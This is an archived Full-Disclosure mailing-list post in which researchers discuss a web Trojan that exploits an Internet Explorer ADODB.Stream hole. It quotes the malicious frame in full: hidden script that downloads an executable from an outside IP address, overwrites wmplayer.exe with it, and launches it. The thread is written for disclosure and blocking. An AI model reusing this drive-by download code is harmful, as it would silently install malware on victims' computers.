| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <401BF8C6.6020306@snosoft.com>
From: dotslash at snosoft.com (KF)
Subject: another Trojan with the ADO hole? + a twist
in the story
Heres the other frame...
> <html><body><img src="1.jpg" width="500" height="400"></body></html>
>
> <textarea id="code" style="display:none;">
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "http://211.19.46.20/5.exe ",0);
> x.Send();
>
> var s = new ActiveXObject("ADODB.Stream");
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
>
> s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
> location.href = "mms://";
>
> </textarea>
Gadi Evron wrote:
> The past Trojan horses which spread this way took advantage of the fact
> web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and
> using that fact, and IE loading it. It was combined with one of the
> latest exploits of the time (I don't think MS patched it yet), and
> downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real
> honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .
>
> Gadi Evron.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists